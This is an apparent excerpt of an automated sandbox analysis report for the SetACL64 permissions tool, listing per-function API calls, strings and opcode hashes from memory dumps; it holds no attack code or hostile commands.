                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_Locinfo_ctor
                                        • String ID: bad locale name
                                        • API String ID: 3718194943-1405518554
                                        • Opcode ID: 1a3bb911b4edc9c961d994df47ad412ba050329201994a1f2ddff9c2ca2b1207
                                        • Instruction ID: b18d9d6a90ea41b88493a7cd670c6ed15ab84ebc6e822d434017d7460284c509
                                        • Opcode Fuzzy Hash: 1a3bb911b4edc9c961d994df47ad412ba050329201994a1f2ddff9c2ca2b1207
                                        • Instruction Fuzzy Hash: 73717BB2A19A41C9EF15DF61D5542BC23A4FF44748F080039DB4DA7A99DF3EE816C324
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$ComputerName
                                        • String ID: GetComputerNameAPIWrapper$Querying the computer name failed with:
                                        • API String ID: 3471954800-1594087890
                                        • Opcode ID: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
                                        • Instruction ID: 38ec03f8199a33b3668a6a558b15845d0e078863b9bd3636afb95cb188205440
                                        • Opcode Fuzzy Hash: 065ba2d2fcd18019d0079e83448bdb250b984e5464f0ba45951be90b2cb0b2c0
                                        • Instruction Fuzzy Hash: 0551C9A2F19782C1EA109B24E5453AD6361FF857A4F505339EA5C83BD9DFBDE880C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                        • String ID:
                                        • API String ID: 1330151763-0
                                        • Opcode ID: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
                                        • Instruction ID: 71de193b9a12ce8679becf87757b71345605cb02f8b81f55450ee24771fe82b0
                                        • Opcode Fuzzy Hash: b9231ba523ef921c185656f1683b76f63ef61d7596155f01418a651d74091a53
                                        • Instruction Fuzzy Hash: 3DC1B3B3B28A46C6EB10CF65D4806AD3761FB89B98F100329DA2E977E5CF39D851C310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Valid_invalid_parameter_noinfo_noreturn$Equal
                                        • String ID:
                                        • API String ID: 2161274208-0
                                        • Opcode ID: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
                                        • Instruction ID: 3034ee1e8eb50bf50f096ccaf1652248657bcf6ff761f882f1812c8893207ebd
                                        • Opcode Fuzzy Hash: a5c13f6e99239f99eb93357bfcbca789068a21bedda29611b1cdf87a38f81f85
                                        • Instruction Fuzzy Hash: 2491C1A2A19A82D1EA209F11D54837A63A1FF85BD4F544239DA5E87798DF3EEC40C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchState
                                        • String ID: csm$csm$csm
                                        • API String ID: 40297248-393685449
                                        • Opcode ID: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
                                        • Instruction ID: 83146714ccc72cac474846e2029284a51771de65691f10657018b4a06cda29e3
                                        • Opcode Fuzzy Hash: 01465d0ab2951ccdcd10f37ed96a7a8c97669fa495d3d06220a6bd79f10303bb
                                        • Instruction Fuzzy Hash: E2D1C3B2A18B41CAEB219F65D4452AD37A0FF45B88F001139EF4D97B85CF39E880C712
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$Specific_invalid_parameter_noinfo_noreturn
                                        • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d %s%02d%02d$-
                                        • API String ID: 1697026759-531884627
                                        • Opcode ID: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                                        • Instruction ID: 58278bfdf5c43c6d90a3c635f062df40a94726280256f7dbfa058458c7548064
                                        • Opcode Fuzzy Hash: c8f77f1d47166479bcfb340e38561e243565818e0dfa4d9be323b608fca60165
                                        • Instruction Fuzzy Hash: CDD14CB2618B81C6DB10DF15F4802AEB7A5FB88B84F50412AEB8D87B68DF7DD545CB10
                                        APIs
                                          • Part of subcall function 00007FF6868608C0: IsValidSid.ADVAPI32(?,?,?,00007FF68686034D,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF6868608E2
                                          • Part of subcall function 00007FF6868608C0: GetLengthSid.ADVAPI32(?,?,?,00007FF68686034D,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF6868608F3
                                        • IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF686860516,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF686860789
                                        • IsValidSid.ADVAPI32(?,?,?,?,?,?,00007FF686860516,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF68686079C
                                        • EqualSid.ADVAPI32(?,?,?,?,?,?,00007FF686860516,?,?,?,?,?,00007FF68685F8CF), ref: 00007FF6868607AE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Valid$EqualLength
                                        • String ID: invalid hash bucket count
                                        • API String ID: 2688289545-1101463472
                                        • Opcode ID: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
                                        • Instruction ID: aec1bc7d455feaea8ee9fb5441f5cd35bd87277d0a54f69524fcdfe86b81e461
                                        • Opcode Fuzzy Hash: 215e4837fbac5d1038da7360346adbacd6a27b358d3f20a4aea1ad4a7b7f4b8a
                                        • Instruction Fuzzy Hash: AB51F6B6615B85C6DB54CF12EA4412973A8FF48BD4F04843ADB9D83BA5DF39E860C360
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_GetctypeLocinfo::_Locinfo_ctorRegister
                                        • String ID: asio.system
                                        • API String ID: 2324539378-4188385678
                                        • Opcode ID: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
                                        • Instruction ID: 2aa9f56c5519146b10ebf07bcfcdd41a668224ce0b281bbade2766c8b8e44cb0
                                        • Opcode Fuzzy Hash: b713dadba4159cd6b2885aab081a9f7acc6a6da892865188596ee75eb23cfb0b
                                        • Instruction Fuzzy Hash: 29318FA2A0CA42C5EA05DB59EA801B96360FF85B94F080139DB4D977E5DE6EEC51C320
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                        • String ID: \\?\UNC\
                                        • API String ID: 2081738530-3025105874
                                        • Opcode ID: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
                                        • Instruction ID: cb7c375bac609c8eeabf6a0a5e942b8854c30d47ad0816f5082964d97e39d29b
                                        • Opcode Fuzzy Hash: e61a02660369b208d4869bf3317d8eeecda6ec06fbff3dc1bbd376d3e95adc6e
                                        • Instruction Fuzzy Hash: 4E31DEA1A48A42C1EA01DB66E4402B9A360FF89B94F084139DB8D837E5DF7EEC11C320
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$DeleteInformationValid
                                        • String ID:
                                        • API String ID: 2376240148-0
                                        • Opcode ID: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
                                        • Instruction ID: d6778ddde4d9b8e200e60b114b42d5825b5e084ff569168b2580374e082012ef
                                        • Opcode Fuzzy Hash: c39aa1aca0cd00dc7d4238e9c45bf37263b6fe557bd30a66a51f3a55d98a4b0b
                                        • Instruction Fuzzy Hash: C96180B2B19682C9FF10CF65E4983AD23A5FF44788F400539DA4E97A94CE79E801C324
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: 3902d700e4e9c02f7b197dc7376ff7fc9a32c522704f9573ed0591f326e22e7f
                                        • Instruction ID: 184ca745b0382b4444eff3d6e69f0dc85c95136decf61ffc826901ef96354cfe
                                        • Opcode Fuzzy Hash: 3902d700e4e9c02f7b197dc7376ff7fc9a32c522704f9573ed0591f326e22e7f
                                        • Instruction Fuzzy Hash: BDC136A2A1C787C2EB609B1594252BDA791FF81B81F444139DA8E877B1CF3EEC55C360
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$CreateFile$ErrorLast
                                        • String ID:
                                        • API String ID: 2384231905-0
                                        • Opcode ID: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
                                        • Instruction ID: f7628ec9d9e294fb19bf9303db138274345bb7d7a282b4d15a6f13d8164fcce6
                                        • Opcode Fuzzy Hash: 0eb886a8d4768f19568f5e6099b32da699c40024d309cc6945aa3d39ec1d6415
                                        • Instruction Fuzzy Hash: C7816EA2B18642C1EA109B25E45936D6252BF84BE8F40423DDB5E877E9DF3EDC84C760
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CreateFile_invalid_parameter_noinfo_noreturn$ErrorLast
                                        • String ID:
                                        • API String ID: 4071529928-0
                                        • Opcode ID: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
                                        • Instruction ID: 1e75416a831b81700c47d7d9835695fc26712fea72a0e96a5c1e4934af8c14ce
                                        • Opcode Fuzzy Hash: 86a63f8ac1b34f836c6370ff0e3d0cf0e1df9ed1dc5296b969972eb07ba71060
                                        • Instruction Fuzzy Hash: 1C51A0B2A08642C5EB10DB25E45937D22A2BF84BD8F50423DDB5E876A9DF3EDC80C750
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                        • String ID: bad locale name$boost::too_few_args: format-string referred to more arguments than were passed
                                        • API String ID: 2967684691-1915342359
                                        • Opcode ID: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
                                        • Instruction ID: 68a54a09471adddd15e6c2dfedc425aae237b2083b18e025860b236e28e49fae
                                        • Opcode Fuzzy Hash: 6fce13af95b5f6627bf353f9880eae4aab78e0fa0b6ce40869ca327f0ee4b133
                                        • Instruction Fuzzy Hash: 1A5169A2B19B81CAEB10DBB4D5402AC33B4BF94748F044139DF4DA7A56DF39A866D314
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 3668304517-0
                                        • Opcode ID: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
                                        • Instruction ID: 4048634167feb9d050436bfb3bbc3c304df29b2bda0a5d71aa432abf5d5043ae
                                        • Opcode Fuzzy Hash: c51a83a8394eca94e03b9f44e2b4faae1dc388095b0f2f85e928d261f870c053
                                        • Instruction Fuzzy Hash: 964196E2A25742C5EF049B28D45D7BD2251FF447A8F408239EB6D466D6DF7EE880C324
                                        APIs
                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF68686835D
                                        • GetLastError.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF68686836B
                                        • LoadLibraryExW.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF686868395
                                        • FreeLibrary.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF6868683DB
                                        • GetProcAddress.KERNEL32(?,?,?,00007FF68686858A,?,?,?,00007FF686868284,?,?,?,?,00007FF686865001), ref: 00007FF6868683E7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                        • String ID: api-ms-
                                        • API String ID: 2559590344-2084034818
                                        • Opcode ID: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
                                        • Instruction ID: 9dae356843e33ace5e1bb9263707ea7b4e54aef8c19b499b55719123250e6134
                                        • Opcode Fuzzy Hash: 13dd072e1bb41a21cd92e4e58addc349d8cc729cde5a11a5225393acf1a03f06
                                        • Instruction Fuzzy Hash: CE31E5A1B2A646C5FE219B02A84457A2395FF48B60F190539DE1D8B391EF3EE804C330
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                        • String ID: CONOUT$
                                        • API String ID: 3230265001-3130406586
                                        • Opcode ID: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
                                        • Instruction ID: 572d539de747e5d9e14f76fa5a9723b6c5e6272019e4a120bca678b000d1cbc0
                                        • Opcode Fuzzy Hash: 600edac47a027b3d7eb0109fe524e7f64bf11a566be2c18d05efb9c518b43446
                                        • Instruction Fuzzy Hash: 5B11AFA1B58A41C6E3508B12A85572972A0FF88BE5F040238EA5EC77A5CF3DD800C754
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiStringWide
                                        • String ID:
                                        • API String ID: 2829165498-0
                                        • Opcode ID: 7f76452235485e82c6a2b8be4f7a02939a3fff3751e97289b820c814a5331ee2
                                        • Instruction ID: 53e15f41ae5e384b99c6c492f131ab6235d0723ecabc689a927ce2c52c9d1bc2
                                        • Opcode Fuzzy Hash: 7f76452235485e82c6a2b8be4f7a02939a3fff3751e97289b820c814a5331ee2
                                        • Instruction Fuzzy Hash: D581B2B2A28782C6EB208F55944437E66A1FF44BA4F044238EB9E97BD5DF3DE805C710
                                        APIs
                                        • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF68684F5AD), ref: 00007FF686853B8B
                                        • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,00000000,00001000,?,00007FF68684F5AD), ref: 00007FF686853BAF
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Information
                                        • String ID:
                                        • API String ID: 2951059284-0
                                        • Opcode ID: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
                                        • Instruction ID: 9a3bf9d495c13862ded4c427606a9a1e4bfd08474d82bddae32a2f31bbb405d9
                                        • Opcode Fuzzy Hash: 5a35f54198f71293160f6a52ccbbda1ccbfc04340909618ab7250ec950f78163
                                        • Instruction Fuzzy Hash: BC617FA2A0C696C6EB60CB11D45877A67A1FF85B84F144039DE8F87695EF3EEC41C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
